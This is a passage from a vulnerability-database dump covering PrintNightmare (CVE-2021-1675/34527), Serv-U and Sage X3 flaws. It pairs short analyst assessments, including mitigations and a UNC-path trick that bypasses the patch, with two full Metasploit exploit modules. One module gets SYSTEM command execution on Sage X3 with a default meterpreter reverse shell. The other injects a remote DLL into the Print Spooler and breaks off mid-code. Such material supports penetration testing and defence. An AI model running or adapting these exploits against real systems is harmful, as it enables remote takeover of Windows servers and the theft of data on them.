shows that the patches released are not sufficient to stop this exploit. It has been tested in Server 2016 and Server 2019.\n\nDisable the print spooler can prevent exploitation.\n\nEvent logs can be found for both successful and non-successful exploit attempts in some situations.\n\nSigma rules can be found: <https://github.com/SigmaHQ/sigma/pull/1592>\n\n**ccondon-r7** at July 01, 2021 1:43pm UTC reported:\n\n#### Vulnerability\n\nThis was originally classified as a Local Priv Escalation, however recent POC code has been released that enabled a domain authenticated user to remotely escalate to `SYSTEM` on vulnerable services\n\n#### Exploit Code\n\nThere are several functional exploits available on Github after the initial repository was removed by the authors.\n\n * <https://github.com/afwu/PrintNightmare> \u2013 A windows binary exploit \n\n * <https://github.com/cube0x0/CVE-2021-1675> \u2013 Python3 using a modified version of impacket \n\n\n#### Mitigation\n\nInitial testing shows that the patches released are not sufficient to stop this exploit. It has been tested in Server 2016 and Server 2019.\n\nDisable the print spooler can prevent exploitation.\n\nEvent logs can be found for both successful and non-successful exploit attempts in some situations.\n\nSigma rules can be found: <https://github.com/SigmaHQ/sigma/pull/1592>\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5Assessed Attacker Value: 5\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-06-08T00:00:00", "type": "attackerkb", "title": "CVE-2021-1675", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1675", "CVE-2021-34527"], "modified": "2023-10-07T00:00:00", "id": "AKB:CDA9C43E-015D-4B04-89D3-D6CABC5729B9", "href": "https://attackerkb.com/topics/dI1bxlM0ay/cve-2021-1675", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-10-18T16:38:40", "description": "Windows Print Spooler Remote Code Execution Vulnerability\n\n \n**Recent assessments:** \n \n**zeroSteiner** at July 08, 2021 5:09pm UTC reported:\n\nCVE-2021-34527 is related to the previous CVE-2021-1675. This fixes a vulnerability whereby an authenticated attacker can connect to the remote print service (via either MS-RPRN or MS-PAR) and add a driver using a custom DLL. Upon successful exploitation, the Print Spool service would load the attacker controlled DLL from either a remote UNC path or a local path. In both cases, the DLL is then executed with NT AUTHORITY\\SYSTEM privileges.\n\nThe patch for CVE-2021-34527 is effective at preventing this attack **only when Point and Print** is disabled, which is the default setting. This can be configured by ensuring the registry key `HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows NT\\Printers\\PointAndPrint NoWarningNoElevationOnInstall` is 0. The system does not need to be rebooted to enforce the changed registry key. If that registry key is defined as 1, the vulnerability can still be exploited. With Point and Print enabled, a standard UNC path used over the MS-RPRN vector (via `RpcAddPrinterDriverEx`) will fail with `ERROR_INVALID_PARAMETER`. This can be bypassed by converting the UNC path from the standard syntax (`\\\\1.2.3.4\\public\\payload.dll`) to the alternative syntax (`\\??\\UNC\\1.2.3.4\\public\\payload.dll`).\n\nWith the patches applied and Point and Print disabled, the affected calls to `RpcAddPrinterDriverEx` will return ERROR_ACCESS_DENIED.\n\n**ccondon-r7** at July 08, 2021 12:12am UTC reported:\n\nCVE-2021-34527 is related to the previous CVE-2021-1675. This fixes a vulnerability whereby an authenticated attacker can connect to the remote print service (via either MS-RPRN or MS-PAR) and add a driver using a custom DLL. Upon successful exploitation, the Print Spool service would load the attacker controlled DLL from either a remote UNC path or a local path. In both cases, the DLL is then executed with NT AUTHORITY\\SYSTEM privileges.\n\nThe patch for CVE-2021-34527 is effective at preventing this attack **only when Point and Print** is disabled, which is the default setting. This can be configured by ensuring the registry key `HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows NT\\Printers\\PointAndPrint NoWarningNoElevationOnInstall` is 0. The system does not need to be rebooted to enforce the changed registry key. If that registry key is defined as 1, the vulnerability can still be exploited. With Point and Print enabled, a standard UNC path used over the MS-RPRN vector (via `RpcAddPrinterDriverEx`) will fail with `ERROR_INVALID_PARAMETER`. This can be bypassed by converting the UNC path from the standard syntax (`\\\\1.2.3.4\\public\\payload.dll`) to the alternative syntax (`\\??\\UNC\\1.2.3.4\\public\\payload.dll`).\n\nWith the patches applied and Point and Print disabled, the affected calls to `RpcAddPrinterDriverEx` will return ERROR_ACCESS_DENIED.\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5Assessed Attacker Value: 4\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-07-02T00:00:00", "type": "attackerkb", "title": "CVE-2021-34527 \"PrintNightmare\"", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1675", "CVE-2021-34527"], "modified": "2022-05-25T00:00:00", "id": "AKB:7575B82F-7B7A-4416-B1AA-B8A2DF4D0800", "href": "https://attackerkb.com/topics/MIHLz4sY3s/cve-2021-34527-printnightmare", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-10-18T16:42:20", "description": "Microsoft discovered a remote code execution (RCE) vulnerability in the SolarWinds Serv-U product utilizing a Remote Memory Escape Vulnerability. If exploited, a threat actor may be able to gain privileged access to the machine hosting Serv-U Only. SolarWinds Serv-U Managed File Transfer and Serv-U Secure FTP for Windows before 15.2.3 HF2 are affected by this vulnerability.\n\n \n**Recent assessments:** \n \n**NinjaOperator** at July 12, 2021 4:00pm UTC reported:\n\nSolarWinds was recently notified by Microsoft of a security vulnerability (RCE) related to Serv-U Managed File Transfer Server and Serv-U Secured FTP and have developed a hotfix to resolve this vulnerability. While Microsoft\u2019s research indicates this vulnerability exploit involves a limited, targeted set of customers and a single threat actor, our joint teams have mobilized to address it quickly.\n\nThe vulnerability exists in the latest Serv-U version 15.2.3 HF1 released May 5, 2021, and all prior versions. A threat actor who successfully exploits CVE-2021-34527 can run arbitrary code with SYSTEM privileges and install programs; view, change, or delete data, and run programs.\n\n**wvu-r7** at July 22, 2021 4:35pm UTC reported:\n\nSolarWinds was recently notified by Microsoft of a security vulnerability (RCE) related to Serv-U Managed File Transfer Server and Serv-U Secured FTP and have developed a hotfix to resolve this vulnerability. While Microsoft\u2019s research indicates this vulnerability exploit involves a limited, targeted set of customers and a single threat actor, our joint teams have mobilized to address it quickly.\n\nThe vulnerability exists in the latest Serv-U version 15.2.3 HF1 released May 5, 2021, and all prior versions. A threat actor who successfully exploits CVE-2021-34527 can run arbitrary code with SYSTEM privileges and install programs; view, change, or delete data, and run programs.\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5Assessed Attacker Value: 4\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-07-13T00:00:00", "type": "attackerkb", "title": "CVE-2021-35211", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-34527", "CVE-2021-35211"], "modified": "2023-10-07T00:00:00", "id": "AKB:9ADF44D2-FA0D-4643-8B97-8B46983B6917", "href": "https://attackerkb.com/topics/Toj3cA6kd7/cve-2021-35211", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "packetstorm": [{"lastseen": "2021-07-21T17:37:44", "description": "", "cvss3": {}, "published": "2021-07-21T00:00:00", "type": "packetstorm", "title": "Sage X3 Administration Service Authentication Bypass / Command Execution", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2020-7387", "CVE-2020-7388"], "modified": "2021-07-21T00:00:00", "id": "PACKETSTORM:163624", "href": "https://packetstormsecurity.com/files/163624/Sage-X3-Administration-Service-Authentication-Bypass-Command-Execution.html", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nclass MetasploitModule < Msf::Exploit::Remote \n \nRank = GoodRanking \n \ninclude Msf::Exploit::Remote::Tcp \ninclude Msf::Exploit::EXE \ninclude Msf::Exploit::FileDropper \n \ndef initialize(info = {}) \nsuper( \nupdate_info( \ninfo, \n'Name' => 'Sage X3 Administration Service Authentication Bypass Command Execution', \n'Description' => %q{ \nThis module leverages an authentication bypass exploit within Sage X3 AdxSrv's administration \nprotocol to execute arbitrary commands as SYSTEM against a Sage X3 Server running an \navailable AdxAdmin service. \n}, \n'Author' => [ \n'Jonathan Peterson <deadjakk[at]shell.rip>', # @deadjakk \n'Aaron Herndon' # @ac3lives \n], \n'License' => MSF_LICENSE, \n'DisclosureDate' => '2021-07-07', \n'References' => \n[ \n['CVE', '2020-7387'], # Infoleak \n['CVE', '2020-7388'], # RCE \n['URL', 'https://www.rapid7.com/blog/post/2021/07/07/cve-2020-7387-7390-multiple-sage-x3-vulnerabilities/'] \n], \n'Privileged' => true, \n'Platform' => 'win', \n'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64], \n'Targets' => [ \n[ \n'Windows Command', \n{ \n'Arch' => ARCH_CMD, \n'DefaultOptions' => { \n'PAYLOAD' => 'cmd/windows/generic', \n'CMD' => 'whoami' \n} \n} \n], \n[ \n'Windows DLL', \n{ \n'Arch' => [ARCH_X86, ARCH_X64], \n'DefaultOptions' => { \n'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp' \n} \n} \n], \n[ \n'Windows Executable', \n{ \n'Arch' => [ARCH_X86, ARCH_X64], \n'DefaultOptions' => { \n'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp' \n} \n} \n] \n], \n'DefaultTarget' => 0, \n'Notes' => { \n'Stability' => [CRASH_SAFE], \n'Reliability' => [FIRST_ATTEMPT_FAIL], \n'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK] \n} \n) \n) \n \nregister_options( \n[ \nOpt::RPORT(1818) \n] \n) \nend \n \ndef vprint(msg = '') \nprint(msg) if datastore['VERBOSE'] \nend \n \ndef check \ns = connect \nprint_status('Connected') \n \n# ADXDIR command authentication header \n# allows for unauthenticated retrieval of X3 directory \nauth_packet = \"\\x09\\x00\" \ns.write(auth_packet) \n \n# recv response \nres = s.read(1024) \n \nif res.nil? || res.length != 4 \nprint_bad('ADXDIR authentication failed') \nreturn CheckCode::Safe \nend \n \nif res.chars == [\"\\xFF\", \"\\xFF\", \"\\xFF\", \"\\xFF\"] \nprint_bad('ADXDIR authentication failed') \nreturn CheckCode::Safe \nend \n \nprint_good('ADXDIR authentication successful.') \n \n# ADXDIR command \nadx_dir_msg = \"\\x07\\x41\\x44\\x58\\x44\\x49\\x52\\x00\" \ns.write(adx_dir_msg) \ndirectory = s.read(1024) \n \nreturn CheckCode::Safe if directory.nil? \n \nsagedir = directory[4..-2] \nprint_good(format('Received directory info from host: %s', sagedir)) \ndisconnect \n \nCheckCode::Vulnerable(details: { sagedir: sagedir }) \nrescue Rex::ConnectionError \nCheckCode::Unknown \nend \n \ndef build_buffer(head, sage_payload, tail) \nbuffer = '' \n \n# do things \nbuffer << head if head \nbuffer << sage_payload.length \nbuffer << sage_payload \nbuffer << tail if tail \n \nbuffer \nend \n \ndef write_file(sock, filenum, sage_payload, target, sagedir) \ns = sock \n \n# building the initial authentication packet \n# [2bytes][userlen 1 byte][username][userlen 1 byte][username][passlen 1 byte][CRYPT:HASH] \n# Note: the first byte of this auth packet is different from the ADXDIR command \n \nrevsagedir = sagedir.gsub('\\\\', '/') \n \ns.write(\"\\x06\\x00\") \nauth_resp = s.read(1024) \n \nfail_with(Failure::UnexpectedReply, 'Directory message did not provide intended response') if auth_resp.length != 4 \n \nprint_good('Command authentication successful.') \n \n# May require additional information such as file path \n# this will be used for multiple messages \n \nhead = \"\\x00\\x00\\x36\\x02\\x00\\x2e\\x00\" # head \nfmt = '@%s/tmp/cmd%s$cmd' \nfmt = '@%s/tmp/cmd%s.dll' if target == 'Windows DLL' \nfmt = '@%s/tmp/cmd%s.exe' if target == 'Windows Executable' \npload = format(fmt, revsagedir, filenum) \ntail = \"\\x00\\x03\\x00\\x01\\x77\" \nsendbuf = build_buffer(head, pload, tail) \ns.write(sendbuf) \ns.read(1024) \n \n# Packet --- 3 \n# Creating the packet that contains the command to run \nhead = \"\\x02\\x00\\x05\\x08\\x00\\x00\\x00\" \n \n# this writes the data to the .cmd file to get executed \n# a single write can't be larger than ~250 bytes \n# so writes larger than 250 need to be broken up \nwritten = 0 \nprint_status('Writing data') \n \nwhile written < sage_payload.length \nvprint('.') \n \ntowrite = sage_payload[written..written + 250] \nsendbuf = build_buffer(head, towrite, nil) \ns.write(sendbuf) \ns.recv(1024) \n \nwritten += towrite.length \nend \n \nvprint(\"\\r\\n\") \nend \n \ndef exploit \nsage_payload = payload.encoded if target.name == 'Windows Command' \nsage_payload = generate_payload_dll if target.name == 'Windows DLL' \nsage_payload = generate_payload_exe if target.name == 'Windows Executable' \n \nsagedir = check.details[:sagedir] \n \nif sagedir.nil? \nfail_with(Failure::NotVulnerable, \n'No directory was returned by the remote host, may not be vulnerable') \nend \n \nif sagedir.end_with?('AdxAdmin') \nregister_dir_for_cleanup(\"#{sagedir}\\\\tmp\") \nend \n \nrevsagedir = sagedir.gsub('\\\\', '/') \n \nfilenum = rand_text_numeric(8) \nvprint_status(format('Using generated filename: %s', filenum)) \n \ns = connect \n \nwrite_file(s, filenum, sage_payload, target.name, sagedir) \n \nunless target.name == 'Windows Command' \ndisconnect \n# re-establish connection after writing file \ns = connect \nend \n \nif target.name == 'Windows DLL' \nsage_payload = \"rundll32.exe #{sagedir}\\\\tmp\\\\cmd#{filenum}.dll,0\" \nvprint_status(sage_payload) \nwrite_file(s, filenum, sage_payload, nil, sagedir) \nend \n \nif target.name == 'Windows Executable' \nsage_payload = \"#{sagedir}\\\\tmp\\\\cmd#{filenum}.exe\" \nvprint_status(sage_payload) \nwrite_file(s, filenum, sage_payload, nil, sagedir) \nend \n \n# Some sort of delimiter \ndelim0 = \"\\x02\\x00\\x01\\x01\" # bufm \ns.write(delim0) \ns.recv(1024) \n \n# Packet --- 4 \nsage_payload = \"@#{revsagedir}/tmp/sess#{filenum}$cmd\" \nhead = \"\\x00\\x00\\x37\\x02\\x00\\x2f\\x00\" \ntail = \"\\x00\\x03\\x00\\x01\\x77\" \nsendbuf = build_buffer(head, sage_payload, tail) \ns.write(sendbuf) \ns.recv(1024) \n \n# Packet --- 5 \nhead = \"\\x02\\x00\\x05\\x08\\x00\\x00\\x00\" \nsage_payload = \"@echo off\\r\\n#{sagedir}\\\\tmp\\\\cmd#{filenum}.cmd 1>#{sagedir}\\\\tmp\\\\#{filenum}.out 2>#{sagedir}\\\\tmp\\\\#{filenum}.err\\r\\n@echo on\" \nsendbuf = build_buffer(head, sage_payload, nil) \ns.write(sendbuf) \ns.recv(1024) \n \n# Packet --- Delim \ns.write(delim0) \ns.recv(1024) \n \n# Packet --- 6 \nhead = \"\\x00\\x00\\x36\\x04\\x00\\x2e\\x00\" \nsage_payload = \"#{revsagedir}\\\\tmp\\\\sess#{filenum}.cmd\" \ntail = \"\\x00\\x03\\x00\\x01\\x72\" \nsendbuf = build_buffer(head, sage_payload, tail) \ns.write(sendbuf) \ns.recv(1024) \n \n# if it's not COMMAND, we can stop here \n# otherwise, we'll send/recv the last bit \n# of info for the output \nunless target.name == 'Windows Command' \ndisconnect \nreturn \nend \n \n# Packet --- Delim \ndelim1 = \"\\x02\\x00\\x05\\x05\\x00\\x00\\x10\\x00\" \ns.write(delim1) \ns.recv(1024) \n \n# Packet --- Delim \ns.write(delim0) \ns.recv(1024) \n \n# The two below are directing the server to read from the .out file that should have been created \n# Then we get the output back \n# Packet --- 7 - Still works when removed. \nhead = \"\\x00\\x00\\x2f\\x07\\x08\\x00\\x2b\\x00\" \nsage_payload = \"@#{revsagedir}/tmp/#{filenum}$out\" \nsendbuf = build_buffer(head, sage_payload, nil) \ns.write(sendbuf) \ns.recv(1024) \n \n# Packet --- 8 \nhead = \"\\x00\\x00\\x33\\x02\\x00\\x2b\\x00\" \nsage_payload = \"@#{revsagedir}/tmp/#{filenum}$out\" \ntail = \"\\x00\\x03\\x00\\x01\\x72\" \nsendbuf = build_buffer(head, sage_payload, tail) \ns.write(sendbuf) \ns.recv(1024) \n \ns.write(delim1) \nreturned_data = s.recv(8096).strip! \n \nif returned_data.nil? || returned_data.empty? \ndisconnect \nfail_with(Failure::PayloadFailed, 'No data appeared to be returned, try again') \nend \n \nprint_good('------------ Response Received ------------') \nprint_status(returned_data) \ndisconnect \nend \n \nend \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/163624/x3_adxsrv_auth_bypass_cmd_exec.rb.txt"}, {"lastseen": "2022-05-25T15:25:18", "description": "", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-05-25T00:00:00", "type": "packetstorm", "title": "Print Spooler Remote DLL Injection", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1675", "CVE-2021-34527"], "modified": "2022-05-25T00:00:00", "id": "PACKETSTORM:167261", "href": "https://packetstormsecurity.com/files/167261/Print-Spooler-Remote-DLL-Injection.html", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nrequire 'windows_error' \nrequire 'ruby_smb' \nrequire 'ruby_smb/error' \n \nclass MetasploitModule < Msf::Exploit::Remote \n \nprepend Msf::Exploit::Remote::AutoCheck \ninclude Msf::Exploit::Remote::DCERPC \ninclude Msf::Exploit::Remote::SMB::Client::Authenticated \ninclude Msf::Exploit::Remote::SMB::Server::Share \ninclude Msf::Exploit::Retry \ninclude Msf::Exploit::EXE \ninclude Msf::Exploit::Deprecated \n \nmoved_from 'auxiliary/admin/dcerpc/cve_2021_1675_printnightmare' \n \nPrintSystem = RubySMB::Dcerpc::PrintSystem \n \ndef initialize(info = {}) \nsuper( \nupdate_info( \ninfo, \n'Name' => 'Print Spooler Remote DLL Injection', \n'Description' => %q{ \nThe print spooler service can be abused by an authenticated remote attacker to load a DLL through a crafted \nDCERPC request, resulting in remote code execution as NT AUTHORITY\\SYSTEM. This module uses the MS-RPRN \nvector which requires the Print Spooler service to be running. \n}, \n'Author' => [ \n'Zhiniang Peng', # vulnerability discovery / research \n'Xuefeng Li', # vulnerability discovery / research \n'Zhipeng Huo', # vulnerability discovery \n'Piotr Madej', # vulnerability discovery \n'Zhang Yunhai', # vulnerability discovery \n'cube0x0', # PoC \n'Spencer McIntyre', # metasploit module \n'Christophe De La Fuente', # metasploit module co-author \n], \n'License' => MSF_LICENSE, \n'DefaultOptions' => { \n'SRVHOST' => Rex::Socket.source_address \n}, \n'Stance' => Msf::Exploit::Stance::Aggressive, \n'Targets' => [ \n[ \n'Windows', { \n'Platform' => 'win', \n'Arch' => [ ARCH_X64, ARCH_X86 ] \n}, \n], \n], \n'DisclosureDate' => '2021-06-08', \n'References' => [ \n['CVE', '2021-1675'], \n['CVE', '2021-34527'], \n['URL', 'https://github.com/cube0x0/CVE-2021-1675'], \n['URL', 'https://web.archive.org/web/20210701042336/https://github.com/afwu/PrintNightmare'], \n['URL', 'https://github.com/calebstewart/CVE-2021-1675/blob/main/CVE-2021-1675.ps1'], \n['URL', 'https://github.com/byt3bl33d3r/ItWasAllADream'] \n], \n'Notes' => { \n'AKA' => [ 'PrintNightmare' ], \n'Stability' => [CRASH_SERVICE_DOWN], \n'Reliability' => [UNRELIABLE_SESSION], \n'SideEffects' => [ \nARTIFACTS_ON_DISK # the dll will be copied to the remote server \n] \n} \n) \n) \n \nregister_advanced_options( \n[ \nOptInt.new('ReconnectTimeout', [ true, 'The timeout in seconds for reconnecting to the named pipe', 10 ]) \n] \n) \nderegister_options('AutoCheck') \nend \n \ndef check \nbegin \nconnect(backend: :ruby_smb) \nrescue Rex::ConnectionError \nreturn Exploit::CheckCode::Unknown('Failed to connect to the remote service.') \nend \n \nbegin \nsmb_login \nrescue Rex::Proto::SMB::Exceptions::LoginError \nreturn Exploit::CheckCode::Unknown('Failed to authenticate to the remote service.') \nend \n \nbegin \ndcerpc_bind_spoolss \nrescue RubySMB::Error::UnexpectedStatusCode => e \nnt_status = ::WindowsError::NTStatus.find_by_retval(e.status_code.value).first \nif nt_status == ::WindowsError::NTStatus::STATUS_OBJECT_NAME_NOT_FOUND \nprint_error(\"The 'Print Spooler' service is disabled.\") \nend \nreturn Exploit::CheckCode::Safe(\"The DCERPC bind failed with error #{nt_status.name} (#{nt_status.description}).\") \nend \n \n@target_arch = dcerpc_getarch \n# see: https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rprn/e81cbc09-ab05-4a32-ae4a-8ec57b436c43 \nif @target_arch == ARCH_X64 \n@environment = 'Windows x64' \nelsif @target_arch == ARCH_X86 \n@environment = 'Windows NT x86' \nelse \nreturn Exploit::CheckCode::Detected('Successfully bound to the remote service.') \nend \n \nprint_status(\"Target environment: Windows v#{simple.client.os_version} (#{@target_arch})\") \n \nprint_status('Enumerating the installed printer drivers...') \ndrivers = enum_printer_drivers(@environment) \n@driver_path = \"#{drivers.driver_path.rpartition('\\\\').first}\\\\UNIDRV.DLL\" \nvprint_status(\"Using driver path: #{@driver_path}\") \n \nprint_status('Retrieving the path of the printer driver directory...') \n@config_directory = get_printer_driver_directory(@environment) \nvprint_status(\"Using driver directory: #{@config_directory}\") unless @config_directory.nil? \n \ncontainer = driver_container( \np_config_file: 'C:\\\\Windows\\\\System32\\\\kernel32.dll', \np_data_file: \"\\\\??\\\\UNC\\\\127.0.0.1\\\\#{Rex::Text.rand_text_alphanumeric(4..8)}\\\\#{Rex::Text.rand_text_alphanumeric(4..8)}.dll\" \n) \n \ncase add_printer_driver_ex(container) \nwhen nil # prevent the module from erroring out in case the response can't be mapped to a Win32 error code \nreturn Exploit::CheckCode::Unknown('Received unknown status code, implying the target is not vulnerable.') \nwhen ::WindowsError::Win32::ERROR_PATH_NOT_FOUND \nreturn Exploit::CheckCode::Vulnerable('Received ERROR_PATH_NOT_FOUND, implying the target is vulnerable.') \nwhen ::WindowsError::Win32::ERROR_BAD_NET_NAME \nreturn Exploit::CheckCode::Vulnerable('Received ERROR_BAD_NET_NAME, implying the target is vulnerable.') \nwhen ::WindowsError::Win32::ERROR_ACCESS_DENIED \nreturn Exploit::CheckCode::Safe('Received ERROR_ACCESS_DENIED implying the target is patched.') \nend \n \nExploit::CheckCode::Detected('Successfully bound to the remote service.') \nend \n \ndef run \nfail_with(Failure::BadConfig, 'Can not use an x64 payload on an x86 target.') if @target_arch == ARCH_X86 && payload.arch.first == ARCH_X64 \nfail_with(Failure::NoTarget, 'Only x86 and x64 targets are supported.') if @environment.nil? \nfail_with(Failure::Unknown, 'Failed to enumerate the driver directory.') if @config_directory.nil? \n \nsuper \nend \n \ndef setup \nif Rex::Socket.is_ip_addr?(datastore['SRVHOST']) && Rex::Socket.addr_atoi(datastore['SRVHOST']) == 0 \nfail_with(Exploit::Failure::BadConfig, 'The SRVHOST option must be set to a routable IP address.') \nend \n \nsuper \nend \n \ndef start_service \nfile_name << '.dll' \nself.file_contents = generate_payload_dll \n \nsuper \nend \n \ndef primer \ndll_path = unc \nif dll_path =~ /^\\\\\\\\([\\w:.\\[\\]]+)\\\\(.*)$/ \n# targets patched for CVE-2021-34527 (but with Point and Print enabled) need to use this path style as a bypass \n# otherwise the operation will fail with ERROR_INVALID_PARAMETER \ndll_path = \"\\\\??\\\\UNC\\\\#{Regexp.last_match(1)}\\\\#{Regexp.last_match(2)}\" \nend \nvprint_status(\"Using DLL path: #{dll_path}\") \n \nfilename = dll_path.rpartition('\\\\').last \ncontainer = driver_container(p_config_file: 'C:\\\\Windows\\\\System32\\\\kernel32.dll', p_data_file: dll_path) \n \n3.times do \nadd_printer_driver_ex(container) \nend \n \n1.upto(3) do |directory| \ncontainer.driver_info.p_config_file.assign(\"#{@config_directory}\\\\3\\\\old\\\\#{directory}\\\\#{filename}\") \nbreak if add_printer_driver_ex(container).nil? \nend \n \ncleanup_service \nend \n \ndef driver_container(**kwargs) \nPrintSystem::DriverContainer.new( \nlevel: 2, \ntag: 2, \ndriver_info: PrintSystem::DriverInfo2.new( \nc_version: 3, \np_name_ref_id: 0x00020000, \np_environment_ref_id: 0x00020004, \np_driver_path_ref_id: 0x00020008, \np_data_file_ref_id: 0x0002000c, \np_config_file_ref_id: 0x00020010, \n# https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rprn/4464eaf0-f34f-40d5-b970-736437a21913 \np_name: \"#{Rex::Text.rand_text_alpha_upper(2..4)} #{Rex::Text.rand_text_numeric(2..3)}\", \np_environment: @environment, \np_driver_path: @driver_path, \n**kwargs \n) \n) \nend \n \ndef dcerpc_bind_spoolss \nhandle = dcerpc_handle(PrintSystem::UUID, '1.0', 'ncacn_np', ['\\\\spoolss']) \nvprint_status(\"Binding to #{handle} ...\") \ndcerpc_bind(handle) \nvprint_status(\"Bound to #{handle} ...\") \nend \n \ndef enum_printer_drivers(environment) \nresponse = rprn_call('RpcEnumPrinterDrivers', p_environment: environment, level: 2) \nresponse = rprn_call('RpcEnumPrinterDrivers', p_environment: environment, level: 2, p_drivers: [0] * response.pcb_needed, cb_buf: response.pcb_needed) \nfail_with(Failure::UnexpectedReply, 'Failed to enumerate printer drivers.') unless response.p_drivers&.length \nDriverInfo2.read(response.p_drivers.map(&:chr).join) \nend \n \ndef get_printer_driver_directory(environment) \nresponse = rprn_call('RpcGetPrinterDriverDirectory', p_environment: environment, level: 2) \nresponse = rprn_call('RpcGetPrinterDriverDirectory', p_environment: environment, level: 2, p_driver_directory: [0] * response.pcb_needed, cb_buf: response.pcb_needed) \nfail_with(Failure::UnexpectedReply, 'Failed to obtain the printer driver directory.') unless response.p_driver_directory&.length \nRubySMB::Field::Stringz16.read(response.p_driver_directory.map(&:chr).join).encode('ASCII-8BIT') \nend \n \ndef add_printer_driver_ex(container) \nflags = PrintSystem::APD_INSTALL_WARNED_DRIVER | PrintSystem::APD_COPY_FROM_DIRECTORY | PrintSystem::APD_COPY_ALL_FILES \n \nbegin \nresponse = rprn_call('RpcAddPrinterDriverEx', p_name: \"\\\\\\\\#{datastore['RHOST']}\", p_driver_container: container, dw_file_copy_flags: flags) \nrescue RubySMB::Error::UnexpectedStatusCode => e \nnt_status = 